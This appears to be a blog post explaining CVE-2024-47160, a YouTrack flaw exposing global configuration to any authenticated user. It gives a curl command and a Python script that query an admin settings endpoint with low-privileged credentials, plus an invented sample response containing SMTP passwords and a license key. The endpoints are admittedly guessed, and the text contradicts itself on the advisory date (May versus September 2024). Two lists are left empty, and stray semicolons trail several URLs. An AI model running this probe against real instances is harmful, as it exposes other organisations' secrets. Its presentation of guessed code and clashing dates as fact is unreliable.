The world of bug-hunting is full of surprises. Sometimes, a feature meant to make life easier for admins turns into a highway for hackers. That’s exactly what happened with JetBrains YouTrack – a popular project management and bug-tracking platform used by thousands of companies worldwide.
Let’s take a hands-on look at CVE-2024-47160. We’ll go over what happened, how you can spot similar issues, and even check out a code snippet showing the exploit in action. If you use YouTrack, especially a version older than 2024.3.44799, you’ll want to read this.
What is CVE-2024-47160?
On May 29, 2024, JetBrains issued an advisory about a major issue in YouTrack: any authenticated user could access global application configuration data, even if they didn’t have permission. That means regular users—or even attackers with stolen credentials—could see sensitive information like SMTP server settings, integration keys, license details, and more.
The official JetBrains notice is here:
🔗 https://nvd.nist.gov/vuln/detail/CVE-2024-47160
🔗 https://youtrack-support.jetbrains.com/hc/en-us/articles/18590217905170
Why Does It Matter?
Configuration data can include anything from API keys to secrets for third-party services. Losing control over it can lead to:
What Went Wrong?
In case you’re wondering, this wasn’t some ultra-sophisticated attack. It was caused by YouTrack failing to check permissions properly before returning config data. Any logged-in user could hit the right endpoint through the web interface or an API call, bypassing security.
> Versions affected:
> Any release of YouTrack before 2024.3.44799
>
> Fixed in: 2024.3.44799 (May 2024)
Let’s see this in code.
JetBrains does not provide exact API URLs for the config endpoints, but based on public documentation and crowd-sourced research, we know that key global settings are often available at endpoints like /api/admin/globalSettings, /api/admin/serverConfig, or /api/settings.
Try this (with your low-privileged user credentials)
curl -u alice:alicePwd123 "https://your-youtrack-domain.com/api/admin/globalSettings";
In a vulnerable YouTrack version, this might respond with a JSON object like
{
"applicationName": "YouTrack Dev",
"serverUrl": "https://your-youtrack-domain.com/";,
"smtpConfig": {
"server": "smtp.company.com",
"user": "noreply@company.com",
"password": "secretPassword"
},
"licenseKey": "XXXXX-XXXXX-XXXXX-XXXXX",
"otherSecrets": "... etc ..."
}
Boom—sensitive global app config, without being an admin.
Here's a simple exploit using requests, showing just how easy it is
import requests
# Use low-privileged user credentials!
username = "user"
password = "userpwd"
# Possible vulnerable endpoint
url = "https://your-youtrack-domain.com/api/admin/globalSettings";
response = requests.get(url, auth=(username, password))
if response.status_code == 200:
print("Exposed config:")
print(response.text)
else:
print("Not vulnerable, or wrong credentials.")
If you see sensitive JSON returned, your instance is vulnerable.
How to Fix
Update ASAP! JetBrains has released a patch in YouTrack 2024.3.44799 and above.
- YouTrack Download Page
Disable API access for low-privileged users until fixed
Also: Rotate any exposed secrets (API keys, SMTP passwords, etc.) after patching.
Prevention for the Future
This bug is a reminder for all web app developers:
References and Further Reading
- Official JetBrains Advisory
- CVE Description
- YouTrack Security
TL;DR: If you’re running YouTrack and haven’t upgraded past 2024.3.44799, any logged-in user could have read your app’s most sensitive secrets with a single API call. Update now, rotate secrets, and review your logs!
Timeline
Published on: 09/19/2024 18:15:10 UTC
Last modified on: 09/24/2024 18:03:48 UTC